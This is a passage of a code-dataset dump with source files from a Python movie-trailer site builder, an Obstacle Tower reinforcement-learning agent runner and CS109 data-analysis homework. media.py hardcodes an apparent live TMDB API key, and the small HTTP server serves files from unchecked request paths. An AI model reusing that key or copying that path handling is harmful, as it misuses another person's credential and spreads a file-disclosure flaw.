"text": "'''\nRefs:\n https://gist.github.com/bradmontgomery/2219997\n'''\nfrom BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer as Server\nimport os\n\n\nclass Handler(BaseHTTPRequestHandler):\n '''Handles incoming http requests.'''\n def send_200(self):\n self.send_response(200)\n # self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def send_404(self):\n self.send_error(404)\n self.end_headers()\n\n def do_GET(self):\n targets = ('', '/index.html', '/index.htm')\n path = './pub/' + self.path\n\n # Look for a file in the path provided by the request.\n for p in (os.path.abspath(path + s) for s in targets):\n try:\n with open(p, 'r') as f:\n self.send_200()\n self.wfile.writelines(f)\n return\n except IOError:\n pass\n\n # Send a 404 response if there is no file at the path.\n self.send_404()\n\n\ndef run(port=8000):\n '''\n Starts the local web server.\n\n Args:\n port (int): The port for the server to listen on.\n '''\n address = ('', port)\n httpd = Server(address, Handler)\n print('HTTP server running...')\n httpd.serve_forever()\n\n\nif __name__ == '__main__':\n run()\n"
},
{
"alpha_fraction": 0.529411792755127,
"alphanum_fraction": 0.7058823704719543,
"avg_line_length": 16,
"blob_id": "6105a306386a03720993da1304bcc0a69ef91e4e",
"content_id": "2fdb7b0cceb025619460ef56aaaa0ff607a2f7b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 34,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 2,
"path": "/requirements.txt",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "pystache==0.5.4\ntmdbsimple==1.4.0\n"
},
{
"alpha_fraction": 0.6573604345321655,
"alphanum_fraction": 0.6624365448951721,
"avg_line_length": 19.736841201782227,
"blob_id": "eb4a42b03c4516ce3fe6c998b6ff88fc11013524",
"content_id": "8c6fdd476f35cb90d7409ac7ae17a2bd883b3bf1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 394,
"license_type": "no_license",
"max_line_length": 54,
"num_lines": 19,
"path": "/models.py",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "'''\nA collection of movie model data for the site builder.\n'''\nfrom media import Movie\n\n\nmovies = [\n Movie(title='The Fifth Element'),\n Movie(title='The Dirty Dozen'),\n Movie(title='Escape from New York'),\n Movie(title='Serenity'),\n Movie(title='Kill Bill Vol. 1'),\n Movie(title='Kill Bill Vol. 2'),\n Movie(title='Cowboy Bebop'),\n Movie(title='Porco Rosso')\n]\n\nfor m in movies:\n m.lookup()\n"
},
{
"alpha_fraction": 0.5507832169532776,
"alphanum_fraction": 0.5548256635665894,
"avg_line_length": 22.282352447509766,
"blob_id": "c69bbf90b3dc31bf5abcf2a5b54c582d6df1d700",
"content_id": "7aba251fbe881bfa9a6c2bc611064ef056132da0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1979,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 85,
"path": "/minimatch.py",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "'''A minimatch.js like globbing module.'''\nimport re\nimport fnmatch\nimport os\n\n\ndef _rng_repl(match):\n m = match.groupdict()\n return '[' + ('^' if m['neg'] else '') + m['rng'] + ']'\n\n_os_is_win = True if os.name == 'nt' else False\n_sep = '{sep}'\n_real_sep = r'\\\\' if _os_is_win else '/'\n_any = '[^' + _sep + ']'\n_evr = '[^' + _sep + ']*?'\n_dbl = '**'\n_dbl_repl = '.*?'\n_oth = [\n ('_qum', '\\?', _any),\n ('_str', '\\*', _evr),\n ('_rng', '\\[(?P<neg>[\\^!])?(?P<rng>[\\d\\w-]*?)\\]', _rng_repl)\n]\n\n\ndef _convert(pats):\n '''Takes parts of a glob pattern and converts it to a regex.'''\n for pat in pats:\n if pat == '':\n continue\n elif pat == _dbl:\n yield _dbl_repl\n continue\n for k, v, repl in _oth:\n res = re.sub(v, repl, pat)\n # print(k)\n # if res is not pat:\n # print('--' + k)\n pat = res\n yield pat\n\n\ndef _compile(glob):\n '''\n Takes a glob pattern and compiles it into a regex string,\n returns the regex string.\n '''\n regex = []\n parts = re.split('/*', glob)\n # print(parts)\n\n if _os_is_win and parts[0] == '':\n regex.append('.:')\n\n for i, part in enumerate(_convert(parts)):\n if i > 0 or parts[0] == '':\n regex.append(_sep)\n regex.append(part)\n\n if parts[-1] == '':\n regex.append(_sep)\n # print(regex)\n # This `**{_sep[1:-1]` looks funny but ensures that you can change the name\n # of the _sep var without breaking anything.\n return ''.join(regex).format(**{_sep[1:-1]: _real_sep})\n\n\ndef minimatch(path, pat):\n '''\n Takes a file path and compares it to a glob pattern,\n if there is a match it returns the match obj otherwise None.\n\n Args:\n path (str): The path to check against pat.\n pat (str): The glob pattern to test path against.\n\n Returns:\n A match object if successful, None otherwise.\n '''\n pat = _compile(pat)\n # print(pat)\n return re.match(pat, path)\n\n\n# print(minimatch('/bob/sam/foo.txt', '/**/foo.t?t'))\n# print(minimatch('c:\\\\bob\\\\sam\\\\foo.txt', '/**/foo.t?t'))\n"
},
{
"alpha_fraction": 0.6416184902191162,
"alphanum_fraction": 0.6488439440727234,
"avg_line_length": 26.68000030517578,
"blob_id": "d2ad5f50335c3a3ebc244eb0faa29054fa7beb67",
"content_id": "9057d67f2566b6edd2143a586a7d17bce069b469",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1384,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 50,
"path": "/build.py",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "'''\nThis is a simple build script that walks a source directory,\ncopying, and possibly manipulating, the files to a destination directory.\n\nRefs:\n http://stackoverflow.com/questions/12517451/python-automatically-creating-directories-with-file-output\n'''\nimport pystache\nimport models\nimport os\nimport shutil\nimport errno\nfrom minimatch import minimatch\n\n\nsrc = os.path.abspath('./src')\ndest = os.path.abspath('./pub')\ndata = {'movies': models.movies}\n\n# Remove the previous build if it exists.\ntry:\n shutil.rmtree(dest)\nexcept OSError as ex:\n if ex.errno != errno.ENOENT:\n raise\n\n# Walk the src dir looking for html templates.\nfor root, dirs, files in os.walk(src):\n for f in files:\n in_path = os.path.join(root, f)\n with open(in_path, 'r') as fin:\n tail = root.split(src)[1]\n out_path = os.path.abspath(dest + tail)\n\n # If the path doesn't exist create it.\n try:\n os.makedirs(out_path)\n except OSError as ex:\n if ex.errno != errno.EEXIST:\n raise\n\n out_path += '/' + f\n print(out_path)\n with open(out_path, 'w') as fout:\n # If the file is an html file, pass it through the mustache renderer.\n if minimatch(in_path, '/**/*.html'):\n fout.write(pystache.render(fin.read(), data).encode('utf-8'))\n # Any other file is simply copied.\n else:\n fout.write(fin.read())\n"
},
{
"alpha_fraction": 0.635108470916748,
"alphanum_fraction": 0.6449704170227051,
"avg_line_length": 28.476743698120117,
"blob_id": "5a1e66f6b0b873f9946125a08bcdddf50b352113",
"content_id": "1b2aaa00bdba71cb66871cea4c695a28a5e6395b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2535,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 86,
"path": "/media.py",
"repo_name": "arccoza/fsnd_p0_movie_trailer_website",
"src_encoding": "UTF-8",
"text": "'''\nRefs:\n https://github.com/celiao/tmdbsimple\n'''\nimport tmdbsimple as tmdb\nfrom tmdbsimple import Search, Movies\nfrom pprint import pprint\nfrom requests import HTTPError\n\n\nclass Movie(dict):\n '''\n A Class that contains data about a particular movie, extends dict.\n\n '''\n def __init__(self, **kwargs):\n '''\n Inits Movie with at least the title of the movie.\n Any other data can be arbitrarily provided using named args.\n\n Args:\n title (str): named param that must be provided.\n\n Raises:\n MovieInitError: Raised if you do not provided at least the movie title.\n '''\n # Ensure keys and values are unicode.\n kwargs = {unicode(k): unicode(v) for k, v in kwargs.iteritems()}\n super(Movie, self).__init__(**kwargs)\n\n self._posters_url = 'https://image.tmdb.org/t/p/w640'\n self._videos_url = 'https://www.youtube.com/embed/'\n\n for k, v in self.iteritems():\n if k == 'title':\n return\n raise MovieInitError('You must at least provide a title.')\n\n def lookup(self):\n '''\n Looks up movie info on TMDB,\n and populates the obj with this additional data.\n\n Raises:\n MovieSearchError: If the movie could not be found\n by the title provided to init.\n '''\n try:\n res = search.movie(query=self['title'])\n res = Movies(res['results'][0]['id']).info(append_to_response='videos')\n except (IndexError, HTTPError):\n raise MovieSearchError(\n 'Could not retrieve info on movie: \"' + self['title'] + '\"')\n\n res.update(self)\n self.update(res)\n\n self[u'poster_url'] = self.get('poster_url') or self._posters_url + self['poster_path'] # NOQA\n if 'trailer_url' not in self:\n for v in self['videos']['results']:\n if(v['site'] == u'YouTube' and v['type'] == u'Trailer'):\n self[u'trailer_url'] = self._videos_url + v[u'key']\n break\n\n\nclass MovieInitError(Exception):\n '''Used to indicate a missing title arg in Movie init.'''\n def __init__(self, message, errors=None):\n super(MovieInitError, self).__init__(message)\n self.errors = errors\n\n\nclass MovieSearchError(Exception):\n '''Used when a movie cannot be found by the title arg in Movie init.'''\n def __init__(self, message, errors=None):\n super(MovieSearchError, self).__init__(message)\n self.errors = errors\n\n\ntmdb.API_KEY = '2874d8e2341ae3de760cc2119047fbb0'\nsearch = Search()\n# Movie.fetch_details('The Fifth Element')\n# m = Movie(title='The Fifth Element')\n# m = Movie([('title', 'The Fifth Element')])\n# m.lookup()\n# pprint(m)\n"
}
] | 7 |
idthanm/otc | https://github.com/idthanm/otc | ae1eac536338f823d8b97092a7b6eb311a074e11 | 697f0330186bb354f52d3f5166e01f144e9b05c2 | a5dde37ad4b6fc9de5f2fd959fec9043bf66dcf4 | refs/heads/master | 2020-05-01T00:34:32.717297 | 2019-03-28T09:46:20 | 2019-03-28T09:46:20 | 177,171,345 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7005975842475891,
"alphanum_fraction": 0.7028642296791077,
"avg_line_length": 41.561405181884766,
"blob_id": "6276e5cf22145263ee6f15f26c888aa8cb1864a6",
"content_id": "05ce2a900668fec9209f611bf5bdfcf580180ab0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4853,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 114,
"path": "/obstacle-tower-challenge/run_agent.py",
"repo_name": "idthanm/otc",
"src_encoding": "UTF-8",
"text": "from obstacle_tower_env import ObstacleTowerEnv\nimport sys\nimport numpy as np\nimport argparse\nimport dopamine.discrete_domains.create_otc_env as create_environment\nfrom dopamine.agents.dqn import dqn_agent\nfrom dopamine.agents.implicit_quantile import implicit_quantile_agent\nfrom dopamine.agents.rainbow import rainbow_agent\nfrom dopamine.discrete_domains import checkpointer\nimport tensorflow as tf\n\n\ndef initialize_checkpointer(checkpoint_dir, checkpoint_file_prefix, agent):\n \"\"\"Reloads the latest checkpoint if it exists.\n\n This method will first create a `Checkpointer` object and then call\n `checkpointer.get_latest_checkpoint_number` to determine if there is a valid\n checkpoint in self._checkpoint_dir, and what the largest file number is.\n If a valid checkpoint file is found, it will load the bundled data from this\n file and will pass it to the agent for it to reload its data.\n If the agent is able to successfully unbundle, this method will verify that\n the unbundled data contains the keys,'logs' and 'current_iteration'. It will\n then load the `Logger`'s data from the bundle, and will return the iteration\n number keyed by 'current_iteration' as one of the return values (along with\n the `Checkpointer` object).\n\n Args:\n checkpoint_file_prefix: str, the checkpoint file prefix.\n\n Returns:\n start_iteration: int, the iteration number to start the experiment from.\n experiment_checkpointer: `Checkpointer` object for the experiment.\n \"\"\"\n checkpointer_ = checkpointer.Checkpointer(checkpoint_dir,\n checkpoint_file_prefix)\n start_iteration = 0\n # Check if checkpoint exists. Note that the existence of checkpoint 0 means\n # that we have finished iteration 0 (so we will start from iteration 1).\n latest_checkpoint_version = checkpointer.get_latest_checkpoint_number(\n checkpoint_dir)\n if latest_checkpoint_version >= 0:\n experiment_data = checkpointer_.load_checkpoint(\n latest_checkpoint_version)\n agent.unbundle(checkpoint_dir, latest_checkpoint_version, experiment_data)\n\ndef create_agent(sess, environment, agent_name=None, summary_writer=None,\n debug_mode=False):\n \"\"\"Creates an agent.\n\n Args:\n sess: A `tf.Session` object for running associated ops.\n environment: A gym environment (e.g. Atari 2600).\n agent_name: str, name of the agent to create.\n summary_writer: A Tensorflow summary writer to pass to the agent\n for in-agent training statistics in Tensorboard.\n debug_mode: bool, whether to output Tensorboard summaries. If set to true,\n the agent will output in-episode statistics to Tensorboard. 
Disabled by\n default as this results in slower training.\n\n Returns:\n agent: An RL agent.\n\n Raises:\n ValueError: If `agent_name` is not in supported list.\n \"\"\"\n assert agent_name is not None\n if not debug_mode:\n summary_writer = None\n if agent_name == 'dqn':\n return dqn_agent.DQNAgent(sess, num_actions=environment.action_space.n,\n summary_writer=summary_writer)\n elif agent_name == 'rainbow':\n return rainbow_agent.RainbowAgent(\n sess, num_actions=environment.action_space.n,\n summary_writer=summary_writer)\n elif agent_name == 'implicit_quantile':\n return implicit_quantile_agent.ImplicitQuantileAgent(\n sess, num_actions=environment.action_space.n,\n summary_writer=summary_writer)\n else:\n raise ValueError('Unknown agent: {}'.format(agent_name))\n\n\ndef run_episode(initial_observation, env, agent):\n is_terminal = False\n episode_reward = 0.0\n action = agent.begin_episode(initial_observation)\n \n while not is_terminal:\n observation, reward, is_terminal, _ = env.step(action)\n action = agent.step(reward, observation)\n episode_reward += reward\n \n return episode_reward\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('environment_filename', default='../ObstacleTower/obstacletower', nargs='?')\n parser.add_argument('--docker_training', action='store_true')\n parser.set_defaults(docker_training=False)\n args = parser.parse_args()\n\n env = create_environment.create_otc_environment(environment_filename=args.environment_filename,\n docker_training=args.docker_training, realtime_mode=True)\n sess = tf.Session('', config=tf.ConfigProto(allow_soft_placement=True))\n agent = create_agent(sess=sess, environment=env, agent_name='rainbow')\n initialize_checkpointer(\"..\\\\checkpoints\", 'ckpt', agent)\n\n\n while True:\n initial_observation = env.reset()\n episode_reward = run_episode(initial_observation, env, agent)\n print(\"Episode reward: \" + str(episode_reward))\n\n"
},
{
"alpha_fraction": 0.6838235259056091,
"alphanum_fraction": 0.7058823704719543,
"avg_line_length": 20,
"blob_id": "d8250e37693ae719d20f2bf61f69f87247ea89ac",
"content_id": "4c50f4b3786527c5163cf37aa210c42796ce05ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 272,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 13,
"path": "/test.py",
"repo_name": "idthanm/otc",
"src_encoding": "UTF-8",
"text": "from obstacle_tower_env import ObstacleTowerEnv\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nimport numpy as np\nim = Image.open('1.jpg')\n\n# a = np.random.random((84, 84, 3))\nim_arr = np.array(im)\nb = im.convert('L')\nb_ = np.array(b)\n\nplt.imshow(a)\nplt.show()"
},
{
"alpha_fraction": 0.6851851940155029,
"alphanum_fraction": 0.6851851940155029,
"avg_line_length": 53.33333206176758,
"blob_id": "4f841fcb540020e578e5fff6fc6116725a50b33d",
"content_id": "1732f817dbec802083badd5c91328cb6a236827d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 162,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 3,
"path": "/debug.py",
"repo_name": "idthanm/otc",
"src_encoding": "UTF-8",
"text": "import subprocess\n\nsubprocess.call(['python', '-um', 'dopamine.discrete_domains.train', '--base_dir=.', '--gin_files=.\\\\dopamine\\\\agents\\\\dqn\\\\configs\\\\dqn.gin'])"
}
] | 3 |
xieqihui/CS109 | https://github.com/xieqihui/CS109 | ba45e11bfdf5ce0696113c8642404decc3fca8fa | 0594a1896bddf2aafa6197f93b7e6565b6152ea6 | ea72732d659fa4789ec17c578c6b9f1c6d3189ab | refs/heads/master | 2016-09-10T17:17:59.680368 | 2016-06-15T06:58:29 | 2016-06-15T06:58:29 | 58,844,053 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6354343891143799,
"alphanum_fraction": 0.690800666809082,
"avg_line_length": 33.47058868408203,
"blob_id": "3b41c19f96ce82781e957a4a3b328452d30d2985",
"content_id": "c367e799964d5d75a12e87a2f0ebc17d29348be7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1174,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 34,
"path": "/src/HW2_P2.py",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 2, 2016\n\n@author: xieqihui\n'''\nimport numpy as np\nimport pandas as pd # pandas\nimport matplotlib.pyplot as plt # module for plotting \nimport datetime as dt # module for manipulating dates and times\nimport numpy.linalg as lin # module for performing linear algebra operations\nfrom scipy.stats import norm\nelection = pd.read_csv(\"../Data/2012-general-election-romney-vs-obama.csv\")\n#print election.head()\n\n###Problem 2(b)\nelection.loc[:, 'Start Date'] = pd.to_datetime(election.loc[:, 'Start Date'])\nelection.loc[:, 'End Date'] = pd.to_datetime(election.loc[:, 'End Date'])\npollNov2012 = election[(election['Start Date'] >= pd.Timestamp('2012-11-01')) & (election['Start Date'] <= pd.Timestamp('2012-11-30'))]\nM = pollNov2012.shape[0]\nN = pollNov2012['Number of Observations'].median()\n#print pollNov2012\n\n### Problem 2(c)\np = np.random.binomial(N,0.53)\nsample = np.random.random([1000,N])\n#print sample\nObama = [sum(s <= 0.53) / float(N) for s in sample]\nmu, std = norm.fit(Obama)\nprint \"mu: \" + str(mu) + \" std: \" + str(std)\nfig, ax1 = plt.subplots()\nax1.hist(Obama, bins = 50)\nx = np.linspace(0,1,1000)\nax1.plot(x, norm.pdf(x, mu, std))\nplt.show()\n\n\n"
},
{
"alpha_fraction": 0.7179487347602844,
"alphanum_fraction": 0.7948718070983887,
"avg_line_length": 37.5,
"blob_id": "a129c2ab14ee582801630ad73cdaf0ae8d7ac280",
"content_id": "f84ae80a2e905781b12097eb3e3a18b4591affee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 78,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 2,
"path": "/README.md",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
"text": "# CS109\nSolutions to the homeworks in the Harvard CS109 Data Science course. \n"
},
{
"alpha_fraction": 0.6424763202667236,
"alphanum_fraction": 0.6596564054489136,
"avg_line_length": 36.5,
"blob_id": "26ca09b055240695c8c337d8a4ecd158420acc48",
"content_id": "5cdc74562c3a015760f802b98b4738a0979accaf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3376,
"license_type": "no_license",
"max_line_length": 135,
"num_lines": 90,
"path": "/src/P3.py",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 16, 2016\n\n@author: xieqihui\n'''\nfrom scipy.stats import norm\nfrom P2 import *\n\npopulation = pd.read_excel(\"../Data/indicator gapminder population.xlsx\", \"Data\")\npopulation.index = population[population.columns[0]]\npopulation.drop(population.columns[0], axis=1, inplace=True)\npopulation = population.T\n\ndef ratioNormals(diff, a):\n P_x = 1 - norm.cdf(a, loc=diff)\n P_Y = 1 - norm.cdf(a, loc=0)\n return(P_x/P_Y)\n\ndef prob_3a():\n diff = np.linspace(0,10,100)\n fig = plt.figure()\n ax = fig.add_subplot(1,1,1)\n for a in np.arange(2,6,1):\n ratio = ratioNormals(diff, a)\n ax.plot(diff,ratio, label = 'a= %d' %a)\n plt.xlabel(\"diff\")\n plt.ylabel(\"ratio\")\n plt.yscale('log')\n plt.ylim(0,10**8)\n ax.legend(loc='upper left')\n fig.tight_layout()\n plt.show()\n\ndef ratioCountries(groupedData, a):\n prop = [len(group.Income[group.Income >=a]) /float(len(group.Income.dropna())) for key, group in groupedData]\n z = pd.DataFrame(groupedData.mean().index, columns = ['Region'])\n z['Mean'] = np.round(groupedData.mean().values,2)\n z['P(X > %d)' % a] = np.round(prop, 4)\n return z\n\ndef prob_3b():\n year = 2012\n df = mergeByYear(year).groupby('Region')\n df_ratio = ratioCountries(df, 1e4)\n df_ratio = df_ratio[(df_ratio.Region == 'ASIA') | (df_ratio.Region == 'SOUTH AMERICA')]\n print df_ratio\n\ndef mergeByYearPop(year):\n incomeByYear = mergeByYear(year)\n popByYear = pd.DataFrame(population.loc[year].values, columns=['Population'])\n popByYear['Country'] = population.columns\n incomeByYearPop = pd.merge(left=incomeByYear, right=popByYear, how='inner', on='Country')\n incomeByYearPop['SumIncome'] = incomeByYearPop['Income'] * incomeByYearPop['Population']\n #incomeByYearPop['AdjustedIncome'] = incomeByYearPop['Income'] * incomeByYearPop['Population'] / float(totpop)\n return incomeByYearPop\n\ndef adjustIncome(df):\n totpop = df.sum()['Population']\n df['AdjustedIncome'] = df['Income'] * df['Population'] / float(totpop)\n df['AdjustedIncome'] = np.round(df['AdjustedIncome'], 2)\n return df\n\ndef adjustRatioCountries(groupedData, a):\n prop = [sum((group.Income >= a) * group.Population)/float(group.Population.sum()) for key, group in groupedData]\n z = pd.DataFrame(groupedData.mean().index, columns = ['Region'])\n z['P(x > %d)' % a] = np.round(prop, 4)\n return z\n\ndef prob_3d():\n df = mergeByYearPop(2012)\n adjustedData = df.groupby('Region').apply(adjustIncome)\n adjustedData[(adjustedData.Region == 'ASIA') | (adjustedData.Region == 'SOUTH AMERICA')].boxplot('AdjustedIncome', by='Region')\n plt.ylabel('Adjusted Income')\n plt.yscale('log')\n plt.show()\n #print adjustedData.head()\n\n \n regionAverage = adjustedData.groupby('Region').sum() \n regionAverage.Income = np.round(mergeByYear(2012).groupby('Region').mean().Income,2)\n \n df_ratio = adjustRatioCountries(df.groupby('Region'), 10000)\n df_ratio['AdjustedIncome'] = regionAverage['AdjustedIncome'].values\n df_ratio['OriginalIncome'] = regionAverage['Income'].values\n \n #regionAverage['Average Income'] = np.round(regionAverage['SumIncome'].values / regionAverage['Population'].astype(float).values,2)\n print df_ratio[(df_ratio.Region == 'ASIA') | (df_ratio.Region == 'SOUTH AMERICA')]\n \nif __name__ == '__main__':\n prob_3d()\n\n"
},
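A quick numeric check of `ratioNormals` from `P3.py` above (it compares the upper-tail mass of a unit normal centred at `diff` with one centred at 0; assumes the function and its `scipy.stats.norm` import are in scope):

```python
# P(X > 2) for X ~ N(1, 1), divided by P(Y > 2) for Y ~ N(0, 1)
print(ratioNormals(1.0, 2))  # ~6.97: shifting the mean up by 1 makes exceeding a=2 about 7x likelier
```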
{
"alpha_fraction": 0.5764706134796143,
"alphanum_fraction": 0.6086687445640564,
"avg_line_length": 29.075471878051758,
"blob_id": "2369fd6677fb78debb5c18d0e7071f6b29e0d33d",
"content_id": "d1b2001328d68b7ee415dffd5f78344a31e3f685",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1615,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 53,
"path": "/src/P2.py",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
"text": "'''\nCreated on May 13, 2016\n\n@author: xieqihui\n'''\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ncountries = pd.read_csv(\"../Data/countries.csv\")\nincome = pd.read_excel(\"../Data/indicator gapminder gdp_per_capita_ppp.xlsx\", \"Data\")\nincome.index = income[income.columns[0]]\nincome.drop(income.columns[0], axis=1, inplace=True)\nincome = income.T\n# print income.head()\n \n\ndef mergeByYear(year):\n incomeByYear = pd.DataFrame(income.loc[year].values, columns=['Income'])\n incomeByYear['Country'] = income.columns\n incomeByYear = pd.merge(left=incomeByYear, right=countries, \\\n how='inner', on='Country')\n incomeByYear = incomeByYear[['Country', 'Region', 'Income']]\n return incomeByYear\n\ndef plotData():\n global income\n global countries\n \n yr = 2000\n fig, ax = plt.subplots(1, 1)\n ax.hist(income.loc[yr].dropna())\n ax.set_title(\"Distribution of income in %d\" % yr)\n ax.set_xlabel(\"Income per person\")\n ax.set_ylabel(\"Number of countries\")\n ax.set_xlim((min(income.loc[yr].dropna()), max(income.loc[yr].dropna())))\n \n print mergeByYear(2010).head()\n fig = plt.figure(figsize=(16,12))\n for yr in np.arange(1950,2010,10):\n ax = fig.add_subplot(2,3,(yr - 1950 + 10)/10)\n df = mergeByYear(yr)\n df.boxplot('Income', by = 'Region', ax = ax, rot = 90)\n plt.title(\"Year: \" + str(yr))\n plt.ylabel('Income')\n plt.ylim(10**2, 10.5 **5)\n plt.yscale('log')\n \n fig.tight_layout()\n plt.show()\n \nif __name__ == '__main__':\n plotData()\n \n \n\n\n\n\n\n \n\n"
},
{
"alpha_fraction": 0.6969696879386902,
"alphanum_fraction": 0.7214247584342957,
"avg_line_length": 34.433963775634766,
"blob_id": "b0ec202baa193d80f4de16bbd1755e61ebb3d226",
"content_id": "81c12963b236e29fe43ccab212368d64b0d35eb8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1881,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 53,
"path": "/src/HW1_P1.py",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
"text": "'''\nCreated on Jun 1, 2016\n\n@author: xieqihui\n'''\nimport numpy as np\nimport pandas as pd # pandas\nimport matplotlib.pyplot as plt # module for plotting \nimport datetime as dt # module for manipulating dates and times\nimport numpy.linalg as lin # module for performing linear algebra operations\nimport re\nfrom scipy.constants.constants import year\n\nexprs = pd.read_csv(\"../Data/exprs_GSE5859.csv\")\nsampleinfo = pd.read_csv(\"../Data/sampleinfo_GSE5859.csv\")\nexprs.index = exprs[exprs.columns[0]]\nexprs.drop(exprs.columns[0], axis=1, inplace=True)\n###Reorder the columns to be the same as the order of the filename in sampleinfo\ndigi_in_column = np.array([re.findall(r'\\d+', s) for s in exprs.columns])[:,0].astype(int)\ndigi_in_column.sort()\nnew_column = [\"GSM\"+str(digi)+\".CEL.gz\" for digi in digi_in_column]\nexprs = exprs[new_column]\n#print (exprs.columns == sampleinfo.filename).all()\n\n\n\n### Problem1(c) create elapsedInDays\nsampleinfo.date = pd.to_datetime(sampleinfo.date)\nyr = [d.year for d in sampleinfo.date]\nmon = [d.month for d in sampleinfo.date]\nsampleinfo['year'] = yr\nsampleinfo['month'] = mon\nsampleinfo['elapsedInDays'] = [d.days for d in (sampleinfo.date - pd.Timestamp('2002-10-31'))]\n\n###Problem 1(d) \nsampleinfoCEU = sampleinfo[sampleinfo.ethnicity == 'CEU']\n#print sampleinfoCEU.tail()\nexprsCEU = exprs[sampleinfoCEU.filename]\n\n#print (exprsCEU.columns == sampleinfoCEU.filename).all()\nexprsCEU['average'] = exprsCEU.mean(axis=1)\nfor col in exprsCEU.columns[0:-1]:\n exprsCEU.loc[:,col] = exprsCEU[col] - exprsCEU[\"average\"]\n#print exprsCEU.head()\n\nsample = np.array(exprsCEU.iloc[:,:-1]).transpose()\nsigma = 1/float(sample.shape[1])* np.dot(sample.transpose(), sample)\nU, s, V = lin.svd(sigma)\nPC1 = np.dot(sample, U[:,0])\nfig1, (ax1, ax2) = plt.subplots(nrows= 2, ncols=1)\nax1.hist(PC1, bins = 25)\nax2.scatter(sampleinfoCEU.elapsedInDays, PC1)\nplt.show()\n\n\n\n"
},
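The PCA step at the end of `HW1_P1.py` above projects mean-centred samples onto the top eigenvector of a covariance matrix obtained via SVD. A tiny standalone illustration of a standard variant of the same recipe on random data (the shapes are made up for the demo):

```python
import numpy as np
import numpy.linalg as lin

sample = np.random.randn(10, 5)                            # 10 observations, 5 features
sample = sample - sample.mean(axis=0)                      # centre each feature
sigma = np.dot(sample.T, sample) / float(sample.shape[0])  # covariance estimate
U, s, V = lin.svd(sigma)                                   # eigenvectors of a symmetric matrix
PC1 = np.dot(sample, U[:, 0])                              # scores along the first principal axis
print(PC1.shape)                                           # (10,)
```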
{
"alpha_fraction": 0.6241135001182556,
"alphanum_fraction": 0.6395494341850281,
"avg_line_length": 34.235294342041016,
"blob_id": "4b5057cfa7bb306f5d970d6c73570492a9710dfe",
"content_id": "d05cfde99d4437c38d9a73c66e8e1b12555d8d7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2397,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 68,
"path": "/src/P1.py",
"repo_name": "xieqihui/CS109",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import ticker\nfrom scipy import stats\nimport requests\nimport zipfile\nimport StringIO\n\n###Download zip file and extract csv from the file\n'''\nr = requests.get(\"http://seanlahman.com/files/database/lahman-csv_2014-02-14.zip\")\nzf = zipfile.ZipFile(StringIO.StringIO(r.content))\nsalary = pd.read_csv(zf.open(\"Salaries.csv\"))\nteam = pd.read_csv(zf.open(\"Teams.csv\"))\n'''\n### Load data from local files\nsalary = pd.read_csv(\"Data/Salaries.csv\")\nteam = pd.read_csv(\"Data/Teams.csv\")\n\n#print salary.head()\n#print team.head()\n\nsalary_sum = pd.DataFrame(salary.groupby([\"teamID\",\"yearID\"])[\"salary\"].apply(np.sum))\nsalary_sum.reset_index(inplace=True)\n#print salary_sum.head()\n\nsalary_win = pd.merge(left=salary_sum, right=team, how='inner', \\\n on=['teamID', 'yearID'])\n\n###Plot the relationship between total salary and total win over each year.\n#salary_win.sort_values(by='salary', inplace=True)\nyears = salary_win['yearID'].unique()\nteams = salary_win['teamID'].unique()\n#print teams\nyears.sort()\nresidual = np.ndarray((len(years),len(teams)))\nfig = 